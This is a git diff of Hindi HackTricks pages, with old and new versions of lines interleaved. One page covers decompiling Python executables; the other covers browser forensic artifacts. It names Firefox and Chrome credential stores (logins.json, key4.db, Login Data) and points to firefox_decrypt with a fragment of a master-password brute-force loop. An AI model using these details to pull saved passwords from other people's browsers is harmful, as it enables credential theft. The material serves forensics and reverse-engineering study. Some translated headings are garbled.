**पायथन एक्ज़ी बाइनरी** में कंपाइल करके आप **.pyc प्राप्त** कर सकते हैं द्वारा चलाना:
```bash
python pyinstxtractor.py executable.exe
```
@ -62,13 +62,13 @@ Unknown magic number 227 in /tmp/binary.pyc
```
इसे ठीक करने के लिए आपको उत्पन्न फ़ाइल की शुरुआत में **सही मैजिक नंबर जोड़ने** की आवश्यकता है।
**मैजिक नंबर पायथन संस्करण के साथ भिन्न होते हैं**, **पायथन 3.8** का मैजिक नंबर प्राप्त करने के लिए आपको **पायथन 3.8** टर्मिनल खोलने और निष्पादित करने की आवश्यकता होगी:
**मैजिक नंबर पायथन संस्करण के साथ भिन्न होते हैं**, **पायथन 3.8** का मैजिक नंबर प्राप्त करने के लिए आपको **पायथन 3.8** टर्मिनल खोलने और निम्नलिखित को निष्पादित करने की आवश्यकता ह:
```
>> import imp
>> imp.get_magic().hex()
'550d0d0a'
```
**इस** मामले में पायथन3.8 के लिए **मैजिक नंबर** **`0x550d0d0a`** है, इस त्रुटि को ठीक करने के लिए आपको **.pyc फ़ाइल** की **शुरुआत** में निम्नलिखित बाइट्स जोड़ने की आवश्यकता होगी: `0x0d550a0d000000000000000000000000`
**इस** मामले में पायथन3.8 के लिए **मैजिक नंबर** **`0x550d0d0a`** है, तो, इस त्रुटि को ठीक करने के लिए आपको **.pyc फ़ाइल** की **शुरुआत** में निम्नलिखित बाइट्स जोड़ने की आवश्यकता होगी: `0x0d550a0d000000000000000000000000`
**एक बार** जब आपने **उस** मैजिक हेडर को **जोड़ दिया** होगा, तो **त्रुटि ठीक हो जानी चाहिए.**
@ -80,31 +80,33 @@ hexdump 'binary.pyc' | head
0000020 0700 0000 4000 0000 7300 0132 0000 0064
0000030 0164 006c 005a 0064 0164 016c 015a 0064
```
### त्रुटि: सामान्य त्रुटियों का डिकंपाइलिंग
### त्रुटि: सामान्य त्रुटियाँ डिकॉम्पाइलिंग
**अन्य त्रुटियाँ** जैसे: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` प्रकट हो सकती हैं।
**अन्य त्रुटियाँ** जैसे: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` दिख सकती हैं।
यह संभावना है कि आपने **सही रूप से मैजिक नंबर नहीं जोड़ा** है या आपने **सही मैजिक नंबर का उपयोग नहीं किया** है, इसलिए सुनिश्चित करें कि आप सही उपयोग कर रहे हैं (या एक नया प्रयास करें)।
यह संभावना है कि आपने **सही ढंग से मैजिक नंबर नहीं जोड़ा है** या आपने **सही मैजिक नंबर का उपयोग नहीं किया है**, इसलिए सुनिश्चित करें कि आप सही उपयोग कर रहे हैं (या एक नया प्रयास करें)।
पिछली त्रुटि दस्तावेज़ीकरण की जाँच करें।
पिछली त्रुटि संदर्भ की जाँच करें।
## स्वचालित उपकरण
यह उपकरण [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) समुदाय के लिए उपलब्ध कई उपकरणों को **संग्रहित करता है जो शोधकों को सहायता करते हैं एक्जीक्यूटेबल को अनपैक और डिकंपाइल** करने में जिन्हें पायथन में लिखा गया है (py2exe और pyinstaller)।
कई YARA नियम उपलब्ध हैं जो यह निर्धारित करने में मदद करते हैं कि एक्जीक्यूटेबल पायथन में लिखा गया है (यह स्क्रिप्ट यह भी पुष्टि करता है कि एक्जीक्यूटेबल या तो py2exe द्वारा बनाया गया है या pyinstaller द्वारा)।
**[python-exe-unpacker उपकरण](https://github.com/countercept/python-exe-unpacker)** कई सामुदायिक उपलब्ध उपकरणों का संयोजन करने वाला एक उपकरण के रूप में काम करता है जो शोधकों को पाइथन में लिखे गए क्रियाशील और डिकॉम्पाइल किए गए कार्यक्रमों को अनपैक और डिकॉम्पाइल करने में मदद करने के लिए डिज़ाइन किए गए हैं, विशेष रूप से जिनका निर्माण py2exe और pyinstaller के साथ किया गया है। यह YARA नियम शामिल करता है ताकि पता लगाया जा सके कि क्या एक कार्यक्रम पाइथन पर आधारित है और निर्माण उपकरण की पुष्टि करता है।
### आयात त्रुटि: फ़ाइल नाम: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' मौजूद नहीं है
वर्तमान में, unpy2exe या pyinstxtractor के साथ हमें पायथन बाइटकोड फ़ाइल मिल सकती है जो पूरी नहीं हो सकती है और फिर, इसे **अनकंपाइल6 द्वारा सादा पायथन स्रोत कोड प्राप्त करने के लिए पहचाना नहीं जा सकता**। यह एक गायब पायथन **बाइटकोड संस्करण संख्या** के कारण है। इसलिए हमने एक प्रीपेंड विकल्प शामिल किया; इसमें एक पायथन बाइटकोड संस्करण संख्या शामिल करेगा और डिकंपाइलिंग प्रक्रिया को सुविधाजनक बनाने में मदद करेगा। जब हम अनकंपाइल6 का उपयोग करने का प्रयास करते हैं .pyc फ़ाइल को डिकंपाइल करने के लिए तो एक त्रुटि लौटाता है। हालांकि, **एक बार हम प्रीपेंड विकल्प का उपयोग करते हैं तो हम देख सकते हैं कि पायथन स्रोत कोड सफलतापूर्वक डिकंपाइल किया गया है**
```
एक सामान्य समस्या जो उत्पन्न होती है, वह एक अधूरे पायथन बाइटकोड फ़ाइल से होती है जो **unpy2exe या pyinstxtractor के साथ अनपैकिंग प्रक्रिया** से आती है, जिसके बाद **uncompyle6 द्वारा एक अभावी पायथन बाइटकोड संस्करण संख्या के कारण पहचाना नहीं जाता है**। इस समस्या का समाधान करने के लिए, एक प्रीपेंड विकल्प जोड़ा गया है, जो आवश्यक पायथन बाइटकोड संस्करण संख्या को जोड़ देता है, जिससे डिकॉम्पाइलिंग प्रक्रिया सुविधाजनक होती है।
समस्या का उदाहरण:
```python
# Error when attempting to decompile without the prepend option
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
Traceback (most recent call last):
……………………….
...
ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist
```
```
```python
# Successful decompilation after using the prepend option
test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
[*] On Python 2.7
[+] Magic bytes are already appended.
@ -112,9 +114,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
# Successfully decompiled file
[+] Successfully decompiled.
```
## अनालिज़िंग पायथन असेंबली
## अनुलोमन पायथन असेंबली का विश्लेषण
यदि आप पिछले कदमों का पालन करके पायथन "मूल" कोड निकालने में सक्षम नहीं थे, तो आप **असेंबली** को **निकालने** का प्रयास कर सकते हैं (लेकिन यह **बहुत विवरणशील नहीं** है, इसलिए पुनः मूल कोड को निकालने का प्रयास करें)। यहाँ [इसमें](https://bits.theorem.co/protecting-a-python-codebase/) मैंने एक बहुत ही सरल कोड पाया है जिससे _.pyc_ बाइनरी को **डिसएसेम्बल** किया जा सकता है (कोड फ्लो को समझने के लिए शुभकामनाएँ)। यदि _.pyc_ पायथन2 से है, तो पायथन2 का उपयोग करें:
यदि आप पिछले कदमों का पालन करके पायथन "मूल" कोड निकालने में सक्षम नहीं थे, तो आप कोड को अनुलोमित करने का प्रयास कर सकते हैं (लेकिन यह विवरणात्मक नहीं है, इसलिए पुनः मूल कोड निकालने का प्रयास करें)। [यहाँ](https://bits.theorem.co/protecting-a-python-codebase/) मैंने एक बहुत ही सरल कोड पाया है जिससे आप _.pyc_ बाइनरी को असेम्बल कर सकते हैं (कोड फ्लो को समझने के लिए शुभकामनाएं)। यदि _.pyc_ पायथन2 से है, तो पायथन2 का उपयोग करें:
```bash
>>> import dis
>>> import marshal
@ -159,14 +161,14 @@ True
```
## Python से Executable तक
शुरुआत के लिए, हम आपको दिखाएंगे कि payloads कैसे py2exe और PyInstaller में compile किए जा सकते हैं
शुरुआत के लिए, हम आपको दिखाएंगे कि payloads को py2exe और PyInstaller में कैसे compile किया जा सकता है
### py2exe का उपयोग करके payload बनाने के लिए:
1. [http://www.py2exe.org/](http://www.py2exe.org) से py2exe package को install करें।
2. Payload के लिए (इस मामले में, हम इसे hello.py नाम देंगे), Figure 1 में दिए गए script का उपयोग करें। विकल्प "bundle\_files" जिसका मान 1 है, सभी चीजों को एक exe में शामिल करेगा, जिसमें Python interpreter भी शामिल होगा।
3. एक बार script तैयार हो जाए, हमें "python setup.py py2exe" आदेश जारी करना होगा। यह executable बनाएगा, जैसे Figure 2 में दिखाया गया है।
```
2. Payload के लिए (इस मामले में, हम इसे hello.py नाम देंगे), Figure 1 में दिए गए script का उपयोग करें। विकल्प "bundle\_files" जिसका मान 1 है, सब कुछ को Python interpreter के साथ एक exe में bundle करेगा।
3. एक बार script तैयार हो जाए, हमें "python setup.py py2exe" इस आदेश को जारी करना होगा। यह executable बनाएगा, जैसे Figure 2 में दिखाया गया है।
```python
from distutils.core import setup
import py2exe, sys, os
@ -180,7 +182,7 @@ zipfile = None,
)
```
```
```bash
C:\Users\test\Desktop\test>python setup.py py2exe
running py2exe
*** searching for required modules ***
@ -193,10 +195,10 @@ running py2exe
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
### PyInstaller का उपयोग करके एक पेलोड बनाने के लिए:
### PyInstaller का उपयोग करके payload बनाने के लिए:
1. पाइप का उपयोग करके PyInstaller को इंस्टॉल करें (pip install pyinstaller)।
2. इसके बाद, हमें इस आदेश को जारी करना होगा "pyinstaller --onefile hello.py" (ध्यान दें कि 'hello.py' हमारा पेलोड है)। इससे सब कुछ एक एक्जीक्यूटेबल में बंडल हो जाएगा।
1. Pip का उपयोग करके PyInstaller को इंस्टॉल करें (pip install pyinstaller)।
2. इसके बाद, हमें आदेश जारी करना होगा "pyinstaller --onefile hello.py" (ध्यान दें कि 'hello.py' हमारा payload है)। इससे सब कुछ एक executable में बंडल हो जाएगा।
```
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
108 INFO: PyInstaller: 3.3.1
@ -225,7 +227,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।

View file

@ -6,70 +6,75 @@
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करें और दुनिया के **सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **वर्कफ़्लो** को आसानी से बनाएं और स्वचालित करें।\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और दुनिया के **सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **वर्कफ़्लो** को आसानी से बनाएं और स्वचालित करें।\
आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## ब्राउज़र आर्टिफैक्ट्स <a href="#id-3def" id="id-3def"></a>
जब हम ब्राउज़र आर्टिफैक्ट्स के बारे में बात करते हैं, तो हम नेविगेशन हिस्ट्री, बुकमार्क्स, डाउनलोड की गई फ़ाइलों की सूची, कैश डेटा आदि के बारे में बात करते हैं।
ब्राउज़र आर्टिफैक्ट्स में वेब ब्राउज़र्स द्वारा संग्रहित विभिन्न प्रकार के डेटा शामिल हैं, जैसे नेविगेशन हिस्ट्री, बुकमार्क्स, और कैश डेटा। ये आर्टिफैक्ट्स ऑपरेटिंग सिस्टम के भीतर विशेष फोल्डर में रखे जाते हैं, जो ब्राउज़र के अलग-अलग स्थानों में भिन्न नामों में होते हैं, लेकिन सामान्य रूप से समान प्रकार के डेटा को संग्रहित करते हैं।
े आर्टिफैक्ट्स ऑपरेटिंग सिस्टम में विशेष फ़ोल्डर में स्टोर की जाने वाली फ़ाइलें हैं।
हाँ सबसे सामान्य ब्राउज़र आर्टिफैक्ट्स का सारांश है:
प्रत्येक ब्राउज़र अपनी फ़ाइलें अन्य ब्राउज़रों से अलग स्थान पर स्टोर करता है और उनके पास अलग-अलग नाम होते हैं, लेकिन वे सभी (अधिकांश समय) समान प्रकार के डेटा (आर्टिफैक्ट्स) स्टोर करते हैं।
- **नेविगेशन हिस्ट्री**: उपयोगकर्ता की वेबसाइटों पर यात्राएँ ट्रैक करता है, जो किसी भी दुष्ट साइट पर यात्राओं की पहचान के लिए उपयोगी है।
- **ऑटोकंप्लीट डेटा**: आधारित सुझाव जो अक्सर की गई खोजों पर आधारित हैं, जो नेविगेशन हिस्ट्री के साथ मिलाकर अवलोकन प्रदान करते हैं।
- **बुकमार्क्स**: उपयोगकर्ता द्वारा त्वरित पहुंच के लिए सहेजी गई साइटें।
- **एक्सटेंशन और एड-ऑन्स**: उपयोगकर्ता द्वारा स्थापित ब्राउज़र एक्सटेंशन या एड-ऑन्स।
- **कैश**: वेब सामग्री (जैसे छवियाँ, जावास्क्रिप्ट फ़ाइलें) को संयोजन समयों को बेहतर बनाने के लिए संग्रहित करता है, जिसे फोरेंसिक विश्लेषण के लिए मूल्यवान माना जाता है।
- **लॉगिन्स**: संग्रहित लॉगिन क्रेडेंशियल्स।
- **फेविकॉन्स**: वेबसाइटों से संबंधित आइकन्स, जो टैब्स और बुकमार्क्स में प्रकट होते हैं, उपयोगी होते हैं उपयोगकर्ता यात्राओं पर अतिरिक्त जानकारी के लिए।
- **ब्राउज़र सेशन्स**: खुले ब्राउज़र सत्र से संबंधित डेटा।
- **डाउनलोड्स**: ब्राउज़र के माध्यम से डाउनलोड की गई फ़ाइलों के रिकॉर्ड।
- **फॉर्म डेटा**: वेब फ़ॉर्मों में दर्ज की गई जानकारी, भविष्य के ऑटोफ़िल सुझाव के लिए सहेजी गई।
- **थंबनेल्स**: वेबसाइटों की पूर्वावलोकन छवियाँ।
- **कस्टम डिक्शनरी.txt**: उपयोगकर्ता द्वारा ब्राउज़र के शब्दकोश में जोड़े गए शब्द।
चलिए हम देखते हैं कि ब्राउज़र्स द्वारा स्टोर किए जाने वाले सबसे सामान्य आर्टिफैक्ट्स क्या हैं।
* **नेविगेशन हिस्ट्री:** उपयोगकर्ता की नेविगेशन हिस्ट्री के बारे में डेटा शामिल है। उदाहरण के लिए उपयोगकर्ता ने कुछ दुष्ट साइटों पर जाए होने का पता लगाने के लिए उपयोग किया जा सकता है
* **ऑटोकंप्लीट डेटा:** यह डेटा है जिसे ब्राउज़र सुझाव देता है आपके द्वारा सबसे अधिक खोजा गया आधारित। इसे नेविगेशन हिस्ट्री के साथ उपयोग करके अधिक जानकारी प्राप्त की जा सकती है।
* **बुकमार्क्स:** स्वयं समझदारी।
* **एक्सटेंशन्स और एड ऑन्स:** स्वयं समझदारी।
* **कैश:** वेबसाइटों पर नेविगेट करते समय, ब्राउज़र विभिन्न प्रकार के कैश डेटा (छवियाँ, जावास्क्रिप्ट फ़ाइलें…आदि) बनाता है बहुत से कारणों के लिए। उदाहरण के लिए वेबसाइटों के लोडिंग समय को तेज करने के लिए। ये कैश फ़ाइलें एक जांच जाँच के दौरान डेटा का एक महान स्रोत हो सकती हैं।
* **लॉगिन्स:** स्वयं समझदारी।
* **फेविकॉन्स:** वे छोटे आइकन हैं जो टैब, यूआरएल, बुकमार्क्स और इस प्रकार की जगहों पर पाए जाते हैं। इन्हें एक और स्रोत के रूप में उपयोग किया जा सकता है वेबसाइट या उपयोगकर्ता द्वारा जाए गए स्थानों के बारे में अधिक जानकारी प्राप्त करने के लिए।
* **ब्राउज़र सेशन्स:** स्वयं समझदारी।
* **डाउनलोड्स**: स्वयं समझदारी।
* **फॉर्म डेटा:** फॉर्म में टाइप किया गया कुछ भी ब्राउज़र द्वारा अक्सर स्टोर किया जाता है, ताकि अगली बार जब उपयोगकर्ता फॉर्म में कुछ भरता है तो ब्राउज़र पहले से भरे गए डेटा का सुझाव दे सके।
* **थंबनेल्स:** स्वयं समझदारी।
* **कस्टम डिक्शनरी.txt**: उपयोगकर्ता द्वारा शब्द जोड़े गए।
## फायरफ़ॉक्स
## फायरफॉक्स
फायरफ़ॉक्स प्रोफ़ाइल्स के भीतर उपयोगकर्ता डेटा को संगठित करता है, जो ऑपरेटिंग सिस्टम के आधार पर विशेष स्थानों में संग्रहीत होते हैं:
फायरफॉक्स \~/_**.mozilla/firefox/**_ (Linux) में प्रोफाइल फ़ोल्डर बनाता है, **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS) में, _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
इस फ़ोल्डर के अंदर, फ़ाइल _**profiles.ini**_ उपयोगकर्ता प्रोफ़ाइल(स) के नाम(स) के साथ दिखना चाहिए।\
प्रत्येक प्रोफ़ाइल में "**पथ**" चरण होता है जिसमें उस फ़ोल्डर का नाम होता है जिसमें उसका डेटा स्टोर होगा। फ़ोल्डर को **\_\_profiles.ini**\_\*\* के साथ उपस्थित होना चाहिए। अगर यह नहीं है, तो संभावना है कि यह हटा दिया गया था।
- **Linux**: `~/.mozilla/firefox/`
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
- **Windows**: `%userprofile%\AppData\Roaming/Mozilla/Firefox/Profiles/`
प्रत्येक प्रोफ़ाइल के फ़ोल्डर के अंदर (_\~/.mozilla/firefox/\<ProfileName>/_) पढ़ने योग्य निम्नलिखित फ़ाइलें मिलनी चाहिए:
इन निर्देशिकाओं के भीतर एक `profiles.ini` फ़ाइल उपयोगकर्ता प्रोफ़ाइल्स की सूची देती है। प्रत्येक प्रोफ़ाइल के डेटा को `profiles.ini` के समान निर्देशिका में स्थित `Path` चर में नामित एक फ़ोल्डर में संग्रहीत किया जाता है। यदि किसी प्रोफ़ाइल का फ़ोल्डर अनुपस्थित है, तो यह हटा दिया गया हो सकता है।
* _**places.sqlite**_ : इतिहास (moz\_\_places), बुकमार्क्स (moz\_bookmarks), और डाउनलोड्स (moz\_\_annos)। Windows में उपकरण [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) का उपयोग _**places.sqlite**_ में इतिहास पढ़ने के लिए किया जा सकता है।
* इतिहास डंप करने के लिए क्वेरी: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;`
* ध्यान दें कि लिंक प्रकार एक संख्या है जो इंडिकेट करती है:
* 1: उपयोगकर्ता ने लिंक का पालन किया
* 2: उपयोगकर्ता ने यूआरएल लिखा
* 3: उपयोगकर्ता ने पसंदीदा का उपयोग किया
* 4: आईफ्रेम से लोड किया गया
* 5: HTTP रीडायरेक्ट 301 के माध्यम से पहुंचा गया
* 6: HTTP रीडायरेक्ट 302 के माध्यम से पहुंचा गया
* 7: फ़ाइल डाउनलोड किया गया
* 8: उपयोगकर्ता ने आईफ्रेम के अंदर लिंक का पालन किया
* डाउनलोड्स डंप करने के लिए क्वेरी: `SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;`
*
* _**bookmarkbackups/**_ : बुकमार्क्स बैकअप्स
* _**formhistory.sqlite**_ : **वेब फॉर्म डेटा** (जैसे ईमेल)
* _**handlers.json**_ : प्रोटोकॉल हैंडलर्स (जैसे, कौन _mailto://_ प्रोटोकॉल को हैंडल करेगा)
* _**persdict.dat**_ : उपयोगकर्ता द्वारा शब्द जोड
प्रत्येक प्रोफ़ाइल फ़ोल्डर के भीतर, आप कई महत्वपूर्ण फ़ाइलें पा सकते हैं:
- **places.sqlite**: इतिहास, बुकमार्क्स, और डाउनलोड संग्रहीत करता है। [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) जैसे उपकरण Windows पर इतिहास डेटा तक पहुंच सकते हैं।
- इतिहास और डाउनलोड जानकारी निकालने के लिए विशेष SQL क्वेरी का उपयोग करें।
- **bookmarkbackups**: बुकमार्क की बैकअप करता है।
- **formhistory.sqlite**: वेब फ़ॉर्म डेटा संग्रहीत करता है।
- **handlers.json**: प्रोटोकॉल हैंडलर प्रबंधित करता है।
- **persdict.dat**: कस्टम शब्दकोश शब्द।
- **addons.json** और **extensions.sqlite**: स्थापित एड-ऑन्स और एक्सटेंशन की जानकारी।
- **cookies.sqlite**: कुकी संग्रहण, जिसे Windows पर जांच के लिए [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) उपलब्ध है।
- **cache2/entries** या **startupCache**: कैश डेटा, [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html) जैसे उपकरणों के माध्यम से पहुंचने योग्य।
- **favicons.sqlite**: फेविकॉन्स संग्रहीत करता है।
- **prefs.js**: उपयोगकर्ता सेटिंग्स और पसंद।
- **downloads.sqlite**: पुराने डाउनलोड डेटाबेस, अब places.sqlite में समाहित।
- **thumbnails**: वेबसाइट थंबनेल्स।
- **logins.json**: एन्क्रिप्टेड लॉगिन जानकारी।
- **key4.db** या **key3.db**: संवेदनशील जानकारी को सुरक्षित करने के लिए एन्क्रिप्शन कुंजियाँ संग्रहीत करता है।
इसके अतिरिक्त, ब्राउज़र की एंटी-फिशिंग सेटिंग्स की जांच करने के लिए `prefs.js` में `browser.safebrowsing` एंट्रीज़ की खोज करना किया जा सकता है, जो सुरक्षित ब्राउज़िंग सुविधाएँ सक्षम या अक्षम हैं।
मास्टर पासवर्ड को डिक्रिप्ट करने की कोशिश करने के लिए, आप [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt) का उपयोग कर सकते हैं\
निम्नलिखित स
```bash
#!/bin/bash
@ -86,97 +91,68 @@ done < $passfile
## Google Chrome
Google Chrome उपयोगकर्ता के घर के अंदर प्रोफ़ाइल बनाता है _**\~/.config/google-chrome/**_ (Linux), में _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), या _**/Users/$USER/Library/Application Support/Google/Chrome/**_ (MacOS)।
अधिकांश जानकारी _**Default/**_ या _**ChromeDefaultData/**_ फ़ोल्डर में सहेजी जाएगी जो पहले निर्दिष्ट पथों के अंदर हैं। यहाँ आप निम्नलिखित दिलचस्प फ़ाइलें पा सकते हैं:
Google Chrome उपयोगकर्ता प्रोफ़ाइल को ऑपरेटिंग सिस्टम के आधार पर विशिष्ट स्थानों में संग्रहित करता है:
* _**History**_: URLs, डाउनलोड और खोजे गए शब्द। Windows में, आप इतिहास पढ़ने के लिए उपकरण [ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html) का उपयोग कर सकते हैं। "Transition Type" स्तंभ का मतलब है:
* Link: उपयोगकर्ता ने लिंक पर क्लिक किया
* Typed: URL लिखा गया था
* Auto Bookmark
* Auto Subframe: जोड़ें
* Start page: होम पेज
* Form Submit: एक फ़ॉर्म भरा और भेजा गया था
* Reloaded
* _**Cookies**_: कुकीज़। [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) का उपयोग कुकीज़ की जांच करने के लिए किया जा सकता है।
* _**Cache**_: कैश। Windows में, आप उपकरण [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) का उपयोग कैश की जांच करने के लिए कर सकते हैं।
* _**Bookmarks**_: बुकमार्क्स
* _**Web Data**_: फ़ॉर्म इतिहास
* _**Favicons**_: फ़ेविकॉन्स
* _**Login Data**_: लॉगिन जानकारी (उपयोगकर्ता नाम, पासवर्ड...)
* _**Current Session**_ और _**Current Tabs**_: वर्तमान सत्र डेटा और वर्तमान टैब्स
* _**Last Session**_ और _**Last Tabs**_: इन फ़ाइलों में वह साइटें हैं जो ब्राउज़र में सक्रिय थीं जब Chrome को आखिरी बार बंद किया गया था।
* _**Extensions**_: एक्सटेंशन्स और एडऑन्स फ़ोल्डर
* **Thumbnails** : थंबनेल्स
* **Preferences**: इस फ़ाइल में प्लगइन्स, एक्सटेंशन्स, जियोलोकेशन का उपयोग करने वाली साइटें, पॉपअप्स, सूचनाएँ, DNS prefetching, प्रमाणपत्र अपवाद और बहुत कुछ जैसी अच्छी जानकारी की एक बहुत सारी जानकारी होती है। यदि आप जांच कर रहे हैं कि क्या कोई विशिष्ट Chrome सेटिंग सक्षम थी या नहीं, तो आप शायद इसमें उस सेटिंग को पाएंगे।
* **Browsers built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
* आप बस “**safebrowsing**” के लिए grep कर सकते हैं और परिणाम में `{"enabled: true,"}` खोज सकते हैं जो दिखाता है कि एंटी-फिशिंग और मैलवेयर सुरक्षा सक्षम है।
- **Linux**: `~/.config/google-chrome/`
- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
## **SQLite DB Data Recovery**
इन निर्देशिकाओं में, अधिकांश उपयोगकर्ता डेटा **Default/** या **ChromeDefaultData/** फोल्डर में पाया जा सकता है। निम्नलिखित फ़ाइलें महत्वपूर्ण डेटा रखती हैं:
जैसा कि आप पिछले खंडों में देख सकते हैं, च्रोम और फ़ायरफ़ॉक्स दोनों डेटा सहेजने के लिए **SQLite** डेटाबेस का उपयोग करते हैं। इस उपकरण का उपयोग करके **हटाए गए एंट्रीज़ को पुनः प्राप्त किया जा सकता है** [**sqlparse**](https://github.com/padfoot999/sqlparse) **या** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases)।
- **History**: URL, डाउनलोड और खोज कीवर्ड शामिल है। Windows पर, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) का उपयोग इतिहास को पढ़ने के लिए किया जा सकता है। "Transition Type" स्तंभ में विभिन्न अर्थ होते हैं, जैसे उपयोगकर्ता लिंक पर क्लिक करते हैं, टाइप किए गए URL, फॉर्म सबमिशन और पेज रीलोड्स।
- **Cookies**: कुकीज़ संग्रहित करता है। जांच के लिए, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) उपलब्ध है।
- **Cache**: कैश डेटा को रखता है। जांच करने के लिए, Windows उपयोगकर्ता [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) का उपयोग कर सकते हैं।
- **Bookmarks**: उपयोगकर्ता बुकमार्क्स।
- **Web Data**: फॉर्म इतिहास शामिल है।
- **Favicons**: वेबसाइट फेविकॉन्स को संग्रहित करता है।
- **Login Data**: उपयोगकर्ता नाम और पासवर्ड जैसी लॉगिन क्रेडेंशियल्स शामिल हैं।
- **Current Session**/**Current Tabs**: वर्तमान ब्राउज़िंग सत्र और खुले टैब्स के बारे में डेटा।
- **Last Session**/**Last Tabs**: क्रोम बंद होने से पहले चल रहे अंतिम सत्र के बारे में जानकारी।
- **Extensions**: ब्राउज़र एक्सटेंशन्स और एडऑन्स के लिए निर्देशिकाएँ।
- **Thumbnails**: वेबसाइट थंबनेल्स को संग्रहित करता है।
- **Preferences**: एक फ़ाइल जिसमें सेटिंग्स के लिए जानकारी है, जैसे प्लगइन्स, एक्सटेंशन्स, पॉप-अप्स, सूचनाएँ और अधिक।
